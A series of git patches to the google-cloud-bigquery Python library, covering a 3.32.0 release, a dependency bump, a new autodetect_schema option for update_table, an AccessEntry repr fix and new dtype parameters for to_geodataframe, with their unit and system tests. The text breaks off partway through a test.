chore(main): release 3.32.0 (#2152) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 19 +++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 4b115464c..ff1bd7acc 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,25 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.32.0](https://github.com/googleapis/python-bigquery/compare/v3.31.0...v3.32.0) (2025-05-12) + + +### Features + +* Add dataset access policy version attribute ([#2169](https://github.com/googleapis/python-bigquery/issues/2169)) ([b7656b9](https://github.com/googleapis/python-bigquery/commit/b7656b97c1bd6c204d0508b1851d114719686655)) +* Add preview support for incremental results ([#2145](https://github.com/googleapis/python-bigquery/issues/2145)) ([22b80bb](https://github.com/googleapis/python-bigquery/commit/22b80bba9d0bed319fd3102e567906c9b458dd02)) +* Add WRITE_TRUNCATE_DATA enum ([#2166](https://github.com/googleapis/python-bigquery/issues/2166)) ([4692747](https://github.com/googleapis/python-bigquery/commit/46927479085f13fd326e3f2388f60dfdd37f7f69)) +* Adds condition class and assoc. unit tests ([#2159](https://github.com/googleapis/python-bigquery/issues/2159)) ([a69d6b7](https://github.com/googleapis/python-bigquery/commit/a69d6b796d2edb6ba453980c9553bc9b206c5a6e)) +* Support BigLakeConfiguration (managed Iceberg tables) ([#2162](https://github.com/googleapis/python-bigquery/issues/2162)) ([a1c8e9a](https://github.com/googleapis/python-bigquery/commit/a1c8e9aaf60986924868d54a0ab0334e77002a39)) +* Update the AccessEntry class with a new condition attribute and unit tests ([#2163](https://github.com/googleapis/python-bigquery/issues/2163)) ([7301667](https://github.com/googleapis/python-bigquery/commit/7301667272dfbdd04b1a831418a9ad2d037171fb)) + + +### Bug Fixes + +* `query()` now warns when `job_id` is set and the default `job_retry` is ignored ([#2167](https://github.com/googleapis/python-bigquery/issues/2167)) ([ca1798a](https://github.com/googleapis/python-bigquery/commit/ca1798aaee2d5905fe688d3097f8ee5c989da333)) +* Empty record dtypes ([#2147](https://github.com/googleapis/python-bigquery/issues/2147)) ([77d7173](https://github.com/googleapis/python-bigquery/commit/77d71736fcc006d3ab8f8ba17955ad5f06e21876)) +* Table iterator should not use bqstorage when page_size is not None ([#2154](https://github.com/googleapis/python-bigquery/issues/2154)) ([e89a707](https://github.com/googleapis/python-bigquery/commit/e89a707b162182ededbf94cc9a0f7594bc2be475)) + ## [3.31.0](https://github.com/googleapis/python-bigquery/compare/v3.30.0...v3.31.0) (2025-03-20) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index c0f7a96d6..fe13d2477 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.31.0" +__version__ = "3.32.0" From 156e518c46b5efc7bcfc674c9cccbd2492bcacbe Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 12 May 2025 20:15:23 +0200 Subject: [PATCH 096/202] chore(deps): update dependency db-dtypes to v1.4.3 (#2178) Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 2b5a71c8c..3ff1b2944 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -6,7 +6,7 @@ click===8.1.8; python_version == '3.9' click==8.2.0; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 -db-dtypes==1.4.2 +db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 2c9e158c0..b000aa50c 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,5 +1,5 @@ bigquery_magics==0.9.0 -db-dtypes==1.4.2 +db-dtypes==1.4.3 google.cloud.bigquery==3.31.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index d1e2f39fb..d80ffcd09 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,5 +1,5 @@ bigquery-magics==0.9.0 -db-dtypes==1.4.2 +db-dtypes==1.4.3 google-cloud-bigquery==3.31.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' From 57f940d957613b4d80fb81ea40a1177b73856189 Mon Sep 17 00:00:00 2001 From: Brian Hulette Date: Mon, 12 May 2025 13:10:11 -0700 Subject: [PATCH 097/202] feat: add ability to set autodetect_schema query param in update_table (#2171) * Add ability to set autodetect_schema query_param * fixup! Add ability to set autodetect_schema query_param * fixup! Add ability to set autodetect_schema query_param * fixup! Add ability to set autodetect_schema query_param --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 11 ++++++++ tests/system/test_client.py | 47 +++++++++++++++++++++++++++++++++ tests/unit/test_client.py | 12 ++++++--- 3 files changed, 67 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e7cafc47e..8ad1586f4 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -1389,6 +1389,7 @@ def update_table( self, table: Table, fields: Sequence[str], + autodetect_schema: bool = False, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, ) -> Table: @@ -1419,6 +1420,10 @@ def update_table( fields (Sequence[str]): The fields of ``table`` to change, spelled as the :class:`~google.cloud.bigquery.table.Table` properties. + autodetect_schema (bool): + Specifies if the schema of the table should be autodetected when + updating the table from the underlying source. Only applicable + for external tables. retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): @@ -1438,12 +1443,18 @@ def update_table( path = table.path span_attributes = {"path": path, "fields": fields} + if autodetect_schema: + query_params = {"autodetect_schema": True} + else: + query_params = {} + api_response = self._call_api( retry, span_name="BigQuery.updateTable", span_attributes=span_attributes, method="PATCH", path=path, + query_params=query_params, data=partial, headers=headers, timeout=timeout, diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 9df572b14..6584ca03c 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -978,6 +978,53 @@ def test_update_table_constraints(self): ) self.assertIsNone(reference_table3.table_constraints, None) + def test_update_table_autodetect_schema(self): + dataset = self.temp_dataset(_make_dataset_id("bq_update_table_test")) + + # Create an external table, restrict schema to one field + TABLE_NAME = "test_table" + set_schema = [bigquery.SchemaField("username", "STRING", mode="NULLABLE")] + table_arg = Table(dataset.table(TABLE_NAME)) + + # Create an external_config and include it in the table arguments + external_config = bigquery.ExternalConfig(bigquery.ExternalSourceFormat.AVRO) + external_config.source_uris = SOURCE_URIS_AVRO + external_config.reference_file_schema_uri = REFERENCE_FILE_SCHEMA_URI_AVRO + external_config.schema = set_schema + table_arg.external_data_configuration = external_config + + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + self.assertTrue(_table_exists(table)) + + self.assertEqual(table.schema, set_schema) + + # Update table with schema autodetection + updated_table_arg = Table(dataset.table(TABLE_NAME)) + + # Update the external_config and include it in the table arguments + updated_external_config = copy.deepcopy(external_config) + updated_external_config.autodetect = True + updated_external_config.schema = None + updated_table_arg.external_data_configuration = updated_external_config + + # PATCH call with autodetect_schema=True to trigger schema inference + updated_table = Config.CLIENT.update_table( + updated_table_arg, ["external_data_configuration"], autodetect_schema=True + ) + + # The updated table should have a schema inferred from the reference + # file, which has all four fields. + expected_schema = [ + bigquery.SchemaField("username", "STRING", mode="NULLABLE"), + bigquery.SchemaField("tweet", "STRING", mode="NULLABLE"), + bigquery.SchemaField("timestamp", "STRING", mode="NULLABLE"), + bigquery.SchemaField("likes", "INTEGER", mode="NULLABLE"), + ] + self.assertEqual(updated_table.schema, expected_schema) + @staticmethod def _fetch_single_page(table, selected_fields=None): iterator = Config.CLIENT.list_rows(table, selected_fields=selected_fields) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 34ef680dd..b8140df66 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2385,7 +2385,7 @@ def test_update_table(self): "resourceTags": {"123456789012/key": "value"}, } conn.api_request.assert_called_once_with( - method="PATCH", data=sent, path="/" + path, timeout=7.5 + method="PATCH", data=sent, path="/" + path, timeout=7.5, query_params={} ) self.assertEqual(updated_table.description, table.description) self.assertEqual(updated_table.friendly_name, table.friendly_name) @@ -2439,6 +2439,7 @@ def test_update_table_w_custom_property(self): path="/%s" % path, data={"newAlphaProperty": "unreleased property"}, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual( updated_table._properties["newAlphaProperty"], "unreleased property" @@ -2475,6 +2476,7 @@ def test_update_table_only_use_legacy_sql(self): path="/%s" % path, data={"view": {"useLegacySql": True}}, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual(updated_table.view_use_legacy_sql, table.view_use_legacy_sql) @@ -2567,9 +2569,10 @@ def test_update_table_w_query(self): "schema": schema_resource, }, timeout=DEFAULT_TIMEOUT, + query_params={}, ) - def test_update_table_w_schema_None(self): + def test_update_table_w_schema_None_autodetect_schema(self): # Simulate deleting schema: not sure if back-end will actually # allow this operation, but the spec says it is optional. path = "projects/%s/datasets/%s/tables/%s" % ( @@ -2611,7 +2614,9 @@ def test_update_table_w_schema_None(self): with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: - updated_table = client.update_table(table, ["schema"]) + updated_table = client.update_table( + table, ["schema"], autodetect_schema=True + ) final_attributes.assert_called_once_with( {"path": "/%s" % path, "fields": ["schema"]}, client, None @@ -2623,6 +2628,7 @@ def test_update_table_w_schema_None(self): sent = {"schema": {"fields": None}} self.assertEqual(req[1]["data"], sent) self.assertEqual(req[1]["path"], "/%s" % path) + self.assertEqual(req[1]["query_params"], {"autodetect_schema": True}) self.assertEqual(len(updated_table.schema), 0) def test_update_table_delete_property(self): From 2d173a5bd8a29dfebe492bc3a79469da7f0fcfbd Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 13 May 2025 07:53:27 -0400 Subject: [PATCH 098/202] chore(python): remove docs from templates (#2164) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): remove docs from templates Source-Link: https://github.com/googleapis/synthtool/commit/3fca64a4bb1772258f8cc939a9192b17dbbbf335 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove replacement in owlbot.py --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 ++-- owlbot.py | 10 ---------- 2 files changed, 2 insertions(+), 12 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 51b21a62b..cea9eb68f 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb -# created: 2025-04-10T17:00:10.042601326Z + digest: sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c +# created: 2025-04-16T22:40:03.123475241Z diff --git a/owlbot.py b/owlbot.py index 8cfa2b097..60759adbe 100644 --- a/owlbot.py +++ b/owlbot.py @@ -109,16 +109,6 @@ python.py_samples() -s.replace( - "docs/conf.py", - r'\{"members": True\}', - '{"members": True, "inherited-members": True}', -) -s.replace( - "docs/conf.py", - r"exclude_patterns = \[", - '\\g<0>\n "google/cloud/bigquery_v2/**", # Legacy proto-based types.', -) s.replace( "samples/**/noxfile.py", 'BLACK_VERSION = "black==22.3.0"', From 02176377d5e2fc25b5cd4f46aa6ebfb1b6a960a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 14 May 2025 04:36:37 -0500 Subject: [PATCH 099/202] fix: ensure AccessEntry equality and repr uses the correct `entity_type` (#2182) * fix: ensure AccessEntry equality and repr uses the correct `entity_type` * add a test for access_entries --- google/cloud/bigquery/dataset.py | 4 +-- tests/unit/test_dataset.py | 44 ++++++++++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index d225b7106..f788275cd 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -512,7 +512,7 @@ def __ne__(self, other): return not self == other def __repr__(self): - return f"" + return f"" def _key(self): """A tuple key that uniquely describes this field. @@ -531,7 +531,7 @@ def _key(self): properties["condition"] = condition_key prop_tup = tuple(sorted(properties.items())) - return (self.role, self._entity_type, self.entity_id, prop_tup) + return (self.role, self.entity_type, self.entity_id, prop_tup) def __hash__(self): return hash(self._key()) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 941430827..5cce2a9a7 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -613,6 +613,15 @@ def test_equality_and_hash_without_condition(self): assert hash(entry1) == hash(entry2) assert hash(entry1) != hash(entry3) # Usually true + def test_equality_and_hash_from_api_repr(self): + """Compare equal entries where one was created via from_api_repr.""" + entry1 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry2 = AccessEntry.from_api_repr( + {"role": "OWNER", "specialGroup": "projectOwners"} + ) + assert entry1 == entry2 + assert hash(entry1) == hash(entry2) + def test_equality_and_hash_with_condition(self, condition_1, condition_2): cond1a = Condition( condition_1.expression, condition_1.title, condition_1.description @@ -746,6 +755,13 @@ def test_dataset_property_with_condition(self, condition_1): assert "dataset" in entry._properties assert "condition" in entry._properties + def test_repr_from_api_repr(self): + """Check that repr() includes the correct entity_type when the object is initialized from a dictionary.""" + api_repr = {"role": "OWNER", "userByEmail": "owner@example.com"} + entry = AccessEntry.from_api_repr(api_repr) + entry_str = repr(entry) + assert entry_str == "" + class TestDatasetReference(unittest.TestCase): @staticmethod @@ -1097,6 +1113,34 @@ def test_ctor_explicit(self): self.assertIsNone(dataset.location) self.assertEqual(dataset.is_case_insensitive, False) + def test_access_entries_getter_from_api_repr(self): + """Check that `in` works correctly when Dataset is made via from_api_repr().""" + from google.cloud.bigquery.dataset import AccessEntry + + dataset = self._get_target_class().from_api_repr( + { + "datasetReference": {"projectId": "my-proj", "datasetId": "my_dset"}, + "access": [ + { + "role": "OWNER", + "userByEmail": "uilma@example.com", + }, + { + "role": "READER", + "groupByEmail": "rhubbles@example.com", + }, + ], + } + ) + assert ( + AccessEntry("OWNER", "userByEmail", "uilma@example.com") + in dataset.access_entries + ) + assert ( + AccessEntry("READER", "groupByEmail", "rhubbles@example.com") + in dataset.access_entries + ) + def test_access_entries_setter_non_list(self): dataset = self._make_one(self.DS_REF) with self.assertRaises(TypeError): From ebfd0a83d43bcb96f65f5669437220aa6138b766 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 14 May 2025 13:34:26 -0400 Subject: [PATCH 100/202] feat: Add dtype parameters to to_geodataframe functions (#2176) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: Add dtype parameters to to_geodataframe This change adds support for `bool_dtype`, `int_dtype`, `float_dtype`, and `string_dtype` parameters to the `to_geodataframe` method in `RowIterator` and `QueryJob`. These parameters allow you to specify the desired pandas dtypes for boolean, integer, float, and string columns when converting BigQuery results to GeoDataFrames. The changes include: - Updating `RowIterator.to_geodataframe` to accept and pass these dtype parameters to the underlying `to_dataframe` method. - Updating `QueryJob.to_geodataframe` to accept and pass these dtype parameters to the underlying `RowIterator.to_geodataframe` method. - Adding unit tests to verify the correct handling of these parameters. * updates to several tests re geopandas as well as imports * updates to enum import * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update pyproject.toml Co-authored-by: Tim SweΓ±a (Swast) * Update testing/constraints-3.9.txt Co-authored-by: Tim SweΓ±a (Swast) --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Owl Bot Co-authored-by: Tim SweΓ±a (Swast) --- docs/conf.py | 3 +- google/cloud/bigquery/job/query.py | 36 ++++++++++ google/cloud/bigquery/table.py | 44 ++++++++++++ noxfile.py | 4 +- pyproject.toml | 8 ++- testing/constraints-3.9.txt | 2 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test_table.py | 9 ++- tests/unit/test_table_pandas.py | 103 ++++++++++++++++++++++++++++ 9 files changed, 205 insertions(+), 10 deletions(-) diff --git a/docs/conf.py b/docs/conf.py index 826298090..df1c18b68 100644 --- a/docs/conf.py +++ b/docs/conf.py @@ -61,7 +61,7 @@ # autodoc/autosummary flags autoclass_content = "both" -autodoc_default_options = {"members": True, "inherited-members": True} +autodoc_default_options = {"members": True} autosummary_generate = True @@ -109,7 +109,6 @@ # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [ - "google/cloud/bigquery_v2/**", # Legacy proto-based types. "_build", "**/.nox/**/*", "samples/AUTHORING_GUIDE.md", diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index f14039bc0..f9b99b7fb 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -2102,6 +2102,10 @@ def to_geodataframe( create_bqstorage_client: bool = True, max_results: Optional[int] = None, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2152,6 +2156,34 @@ def to_geodataframe( identifies which one to use to construct a GeoPandas GeoDataFrame. This option can be ommitted if there's only one GEOGRAPHY column. + bool_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.BooleanDtype()``) + to convert BigQuery Boolean type, instead of relying on the default + ``pandas.BooleanDtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("bool")``. BigQuery Boolean + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#boolean_type + int_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Int64Dtype()``) + to convert BigQuery Integer types, instead of relying on the default + ``pandas.Int64Dtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("int64")``. A list of BigQuery + Integer types can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#integer_types + float_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Float32Dtype()``) + to convert BigQuery Float type, instead of relying on the default + ``numpy.dtype("float64")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("float64")``. BigQuery Float + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#floating_point_types + string_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.StringDtype()``) to + convert BigQuery String type, instead of relying on the default + ``numpy.dtype("object")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("object")``. BigQuery String + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type Returns: geopandas.GeoDataFrame: @@ -2175,6 +2207,10 @@ def to_geodataframe( progress_bar_type=progress_bar_type, create_bqstorage_client=create_bqstorage_client, geography_column=geography_column, + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 503ca4e71..e084468f6 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2727,6 +2727,10 @@ def to_geodataframe( progress_bar_type: Optional[str] = None, create_bqstorage_client: bool = True, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2778,6 +2782,34 @@ def to_geodataframe( identifies which one to use to construct a geopandas GeoDataFrame. This option can be ommitted if there's only one GEOGRAPHY column. + bool_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.BooleanDtype()``) + to convert BigQuery Boolean type, instead of relying on the default + ``pandas.BooleanDtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("bool")``. BigQuery Boolean + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#boolean_type + int_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Int64Dtype()``) + to convert BigQuery Integer types, instead of relying on the default + ``pandas.Int64Dtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("int64")``. A list of BigQuery + Integer types can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#integer_types + float_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Float32Dtype()``) + to convert BigQuery Float type, instead of relying on the default + ``numpy.dtype("float64")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("float64")``. BigQuery Float + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#floating_point_types + string_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.StringDtype()``) to + convert BigQuery String type, instead of relying on the default + ``numpy.dtype("object")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("object")``. BigQuery String + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type Returns: geopandas.GeoDataFrame: @@ -2829,6 +2861,10 @@ def to_geodataframe( progress_bar_type, create_bqstorage_client, geography_as_object=True, + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, ) return geopandas.GeoDataFrame( @@ -2932,6 +2968,10 @@ def to_geodataframe( progress_bar_type=None, create_bqstorage_client=True, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -2941,6 +2981,10 @@ def to_geodataframe( progress_bar_type (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. geography_column (str): Ignored. Added for compatibility with RowIterator. + bool_dtype (Any): Ignored. Added for compatibility with RowIterator. + int_dtype (Any): Ignored. Added for compatibility with RowIterator. + float_dtype (Any): Ignored. Added for compatibility with RowIterator. + string_dtype (Any): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. diff --git a/noxfile.py b/noxfile.py index c2b4bbb50..1922a68a5 100644 --- a/noxfile.py +++ b/noxfile.py @@ -109,9 +109,7 @@ def default(session, install_extras=True): # that logic (and the associated tests) we avoid installing the [ipython] extra # which has a downstream effect of then avoiding installing bigquery_magics. if install_extras and session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - install_target = ( - ".[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" - ) + install_target = ".[bqstorage,pandas,ipywidgets,geopandas,matplotlib,tqdm,opentelemetry,bigquery_v2]" elif install_extras: # run against all other UNIT_TEST_PYTHON_VERSIONS install_target = ".[all]" else: diff --git a/pyproject.toml b/pyproject.toml index 38d74cdd0..9c91a2fc8 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -82,7 +82,11 @@ pandas = [ ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] geopandas = ["geopandas >= 0.9.0, < 2.0.0", "Shapely >= 1.8.4, < 3.0.0"] ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] -tqdm = ["tqdm >= 4.7.4, < 5.0.0"] +matplotlib = [ + "matplotlib >= 3.7.1, <= 3.9.2; python_version == '3.9'", + "matplotlib >= 3.10.3; python_version >= '3.10'", +] +tqdm = ["tqdm >= 4.23.4, < 5.0.0"] opentelemetry = [ "opentelemetry-api >= 1.1.0", "opentelemetry-sdk >= 1.1.0", @@ -93,7 +97,7 @@ bigquery_v2 = [ "protobuf >= 3.20.2, < 7.0.0, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. ] all = [ - "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", + "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,matplotlib,tqdm,opentelemetry,bigquery_v2]", ] [tool.setuptools.dynamic] diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index cb6c29f3b..60a155f0d 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -29,4 +29,4 @@ pyarrow==4.0.0 python-dateutil==2.8.2 requests==2.21.0 Shapely==1.8.4 -tqdm==4.7.4 +matplotlib==3.7.1 diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 2cda59bd1..d82f0dfe3 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -22,6 +22,7 @@ from ..helpers import make_connection from .helpers import _make_client from .helpers import _make_job_resource +from google.cloud.bigquery.enums import DefaultPandasDTypes try: from google.cloud import bigquery_storage @@ -30,6 +31,7 @@ except (ImportError, AttributeError): bigquery_storage = None + try: import shapely except (ImportError, AttributeError): @@ -1019,5 +1021,9 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): progress_bar_type=progress_bar_type, create_bqstorage_client=create_bqstorage_client, geography_column=geography_column, + bool_dtype=DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, ) assert df is row_iterator.to_geodataframe.return_value diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 253006547..8daa4ce43 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -31,6 +31,7 @@ from google.cloud.bigquery import exceptions from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +from google.cloud.bigquery.enums import DefaultPandasDTypes from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import DatasetReference @@ -4065,7 +4066,7 @@ def test_to_dataframe_no_tqdm(self): def test_to_dataframe_tqdm_error(self): pytest.importorskip("pandas") - pytest.importorskip("tqdm") + tqdm = pytest.importorskip("tqdm") mock.patch("tqdm.tqdm_gui", new=None) mock.patch("tqdm.notebook.tqdm", new=None) mock.patch("tqdm.tqdm", new=None) @@ -4100,7 +4101,7 @@ def test_to_dataframe_tqdm_error(self): for warning in warned: # pragma: NO COVER self.assertIn( warning.category, - [UserWarning, DeprecationWarning], + [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], ) def test_to_dataframe_w_empty_results(self): @@ -5639,6 +5640,10 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): progress_bar_type, create_bqstorage_client, geography_as_object=True, + bool_dtype=DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 94737732b..43d64d77d 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -261,3 +261,106 @@ def test_to_dataframe_with_jobs_query_response(class_under_test): "Tiffani", ] assert list(df["number"]) == [6, 325, 26, 10, 17, 22, 6, 229, 8] + + +@mock.patch("google.cloud.bigquery.table.geopandas") +def test_rowiterator_to_geodataframe_with_default_dtypes( + mock_geopandas, monkeypatch, class_under_test +): + mock_geopandas.GeoDataFrame = mock.Mock(spec=True) + mock_client = 